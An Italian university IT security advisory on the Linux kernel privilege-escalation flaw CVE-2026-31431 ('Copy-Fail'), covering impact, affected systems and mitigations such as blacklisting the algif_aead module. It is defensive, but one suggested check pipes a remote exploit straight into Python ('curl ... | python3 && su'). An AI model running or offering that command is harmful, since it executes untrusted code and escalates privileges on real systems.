Servizi IT per l'Ateneo logo
Servizi IT per l'Ateneo
Servizi IT per l'Ateneo
Servizi IT per l'Ateneo
Comunicazioni

Vulnerabilità “Copy-Fail” nel kernel Linux (CVE-2026-31431)

5 maggio, 2026

La vulnerabilità CVE-2026-31431, nota come Copy-Fail, interessa il kernel Linux e consente a un utente locale di ottenere privilegi di amministratore (root). Si tratta di una vulnerabilità di tipo privilege escalation, sfruttabile solo da chi ha già accesso al sistema. 

Impatto

La vulnerabilità ha un punteggio CVSS di circa 7.8. Non è sfruttabile da remoto, ma può essere utilizzata in scenari di attacco locali. 
 
L’impatto è maggiore su sistemi multi-utente (server condivisi, ambienti HPC), mentre è limitato su postazioni personali a singolo utente. 

Sistemi interessati

 
ICONA PC

macOS

Non risulta interessato

 

WSL (Windows Subsystem for Linux)

Potrebbe risultare interessato – vedasi https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/96

1. Aggiornare il kernel Linux alla versione corretta non appena disponibile. 
2. In assenza di aggiornamenti, applicare una mitigazione temporanea disabilitando il modulo vulnerabile. 
3. Riavviare il sistema dopo l’applicazione della mitigazione. 

Il modulo algif_aead può essere incluso staticamente nel kernel, oppure caricato dinamicamente tramite modprobe a seconda della distribuzione in uso. 

  • Se il modulo  algif_aead è caricato dinamicamente: disabilitarlo seguendo le procedure più adatte per la distro in uso. 
  • Se il modulo algif_aead è incluso nel kernel: disabilitare l'inizializzazione del modulo al boot impostando il parametro del kernel initcall_blacklist=algif_aead_init 

Se il sistema è aggiornato o la mitigazione è applicata correttamente, il proof-of-concept pubblico non dovrebbero consentire l’escalation dei privilegi. Eseguendo 

curl https://copy.fail/exp | python3 && su && whoami 

se non sono state generate eccezioni, e il nome utente restituito è "root", allora il vostro sistema è vulnerabile. 

Il Servizio Cybersecurity del Politecnico di Torino ha: 
- Informato i referenti informatici dei Dipartimenti 
- Fornito indicazioni tecniche e supporto 
- Supportato l’implementazione delle contromisure su infrastrutture critiche 

In ogni caso, si raccomanda sempre di evitare l’esecuzione di codice non verificato proveniente da Internet. 

Link utili e approfondimenti

Per aggiornamenti ufficiali e informazioni di sicurezza e tecnici, si consiglia di consultare: 

ACN – CSIRT Italia (bollettini e alert di sicurezza)
National Vulnerability Database (NVD) – dettaglio CVE-2026-31431
Analisi della vulnerabilità “Copy-Fail”
 
icona docenti

A chi è rivolto

 
icona docenti

Docenti

 
icona studenti

Ricercatori e PhD

 
icona personale tecnico amministrativo bibliotecario

PTAB